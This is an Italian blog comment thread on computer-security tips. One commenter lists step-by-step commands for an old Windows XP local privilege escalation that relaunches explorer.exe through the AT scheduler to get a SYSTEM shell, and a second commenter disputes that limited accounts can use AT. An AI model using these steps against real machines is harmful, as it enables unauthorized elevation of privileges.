Tips & Tricks di sicurezza informatica
se hai un sistema non patchato ovvio che funziona -.-
hammeronthenet: venne scoperto nel lontano novembre 2006 con l'advisory: "Windows XP Task Scheduler Local Privilege Escalation"
PErchè faticare ??? Su Xp sp2 full patched (riassumo):
-lanciare cmd.exe
-taskkill /F /IM explorer.exe
-time (e prendere nota del time di sistema)
-Rilanciare explorer.exe a diciamo "time di sistema" + 1 minuto tramite il comando at, esempio:at 15:53 /INTERACTIVE "explorer.exe"
-attendere
-premete su "Start" del nuovo explorer.exe (il vostro desktop insomma) lanciato e... guardate che utente fa capolino.
Fino a qualche giorno fa funzionava... non ho idea se esiste una patch.
Ciao
alle 20:54
Giacomo
questo metodo che usa sempre AT non l'ho mai capito, visto che su un account limitato non si hanno i permessi per usare il comando AT. mi piacerebbe sapere perchè tutti si ostinano a dire che permette ad un guest di diventare system....